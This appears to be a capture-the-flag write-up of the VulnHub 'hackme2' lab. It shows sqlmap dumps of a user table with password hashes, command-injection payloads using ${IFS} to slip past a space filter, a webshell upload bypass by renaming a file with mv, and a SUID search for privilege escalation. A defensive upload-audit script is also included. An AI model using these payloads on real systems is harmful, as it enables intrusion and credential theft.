vulnhub - hackme2

Posted by Mar10 on 2024-06-14


Information gathering


Same as hackme1: directory scanning and the like turned up nothing exploitable, so SQL injection gets tried first.

SQL injection

sqlmap -u 'http://192.168.157.163/welcome.php' --method POST --data="search=1" --level 3 --dbs --batch

[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] webapphacking

sqlmap -u 'http://192.168.157.163/welcome.php' --method POST --data="search=1" -D webapphacking -T users -C name,user,pasword --dump --batch

+--------------+------------+---------------------------------------------+
| name         | user       | pasword                                     |
+--------------+------------+---------------------------------------------+
| David        | user1      | 5d41402abc4b2a76b9719d911017c592 (hello)    |
| Beckham      | user2      | 6269c4f71a55b24bad0f0267d9be5508 (commando) |
| anonymous    | user3      | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd) |
| testismyname | test       | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| superadmin   | superadmin | 2386acb2cf356944177746fc92523983            |
| test1        | test1      | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| 123          | test123    | 4297f44b13955235245b2497399d7a93 (123123)   |
+--------------+------------+---------------------------------------------+

Same as before, superadmin's password is Uncrackable

Command execution

Files can still be uploaded, but the upload location cannot be found. The Last Name input box further down can execute commands.


Spaces are filtered; ${IFS} bypasses the filter

system('cat${IFS}welcomeadmin.php')


That reveals the file upload path, so once again it is a one-line webshell plus AntSword for a reverse shell

File upload

This time, though, an image-wrapped webshell is needed; uploading a php file directly produces an error

Sorry, only JPG, JPEG, PNG & GIF files are allowed.Sorry, your file was not uploaded.

After a long time trying, it still ended in failure; the php file could not be uploaded

But since we can execute commands, why not upload the image-wrapped shell and then rename it with the mv command?

system('mv${IFS}/var/www/html/uploads/year2020/shell.png${IFS}/var/www/html/uploads/year2020/shell.php')

Once the rename succeeds, connect with AntSword and get a reverse shell
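
The rename works because the extension check runs only at upload time. As an added example (not part of the original write-up), here is a defender-side audit of an upload directory in Python that flags script extensions, image files with wrong magic bytes, and PHP open tags inside non-script files. The sample tree, the extension list and the function names are assumptions constructed for illustration.

```python
import os
import tempfile

# Magic bytes for the formats the upload form accepts (JPG/JPEG, PNG, GIF).
JPEG = (b"\xff\xd8\xff",)
IMAGE_MAGIC = {".jpg": JPEG, ".jpeg": JPEG, ".png": (b"\x89PNG\r\n\x1a\n",),
               ".gif": (b"GIF87a", b"GIF89a")}
SCRIPT_EXTS = {".php", ".phtml", ".phar", ".php5", ".php7"}  # assumed handler mappings

def audit_uploads(root):
    """Return sorted (relative_path, reason) findings for files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            ext = os.path.splitext(name)[1].lower()
            with open(path, "rb") as fh:
                data = fh.read(1 << 20)  # only the first 1 MiB is inspected
            if ext in SCRIPT_EXTS:
                findings.append((rel, "script extension in upload directory"))
            elif ext in IMAGE_MAGIC and not data.startswith(IMAGE_MAGIC[ext]):
                findings.append((rel, "image extension but wrong magic bytes"))
            elif b"<?php" in data.lower():
                findings.append((rel, "PHP open tag inside non-script file"))
    return sorted(findings)

def build_sample_tree(root):
    """Constructed sample files standing in for uploads/year2020 (not real data)."""
    d = os.path.join(root, "year2020")
    os.makedirs(d)
    png = b"\x89PNG\r\n\x1a\n"
    samples = {
        "photo.png": png + b"\x00" * 32,                # clean image header
        "shell.png": png + b"<?php /* placeholder */",  # valid magic, PHP tag after it
        "shell.php": png + b"<?php /* placeholder */",  # the same file after a rename
        "note.gif": b"plain text, not a GIF",           # extension does not match content
    }
    for name, body in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, reason in audit_uploads(tmp):
            print(f"{rel}: {reason}")
```

Run periodically or from a file-integrity hook, this catches the renamed file even though the upload form itself never accepted a .php name.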

Privilege escalation


Use find to look for files with the SUID bit set

find / -perm -u=s -type f 2>/dev/null


Running /home/legacy/touchmenot escalates privileges successfully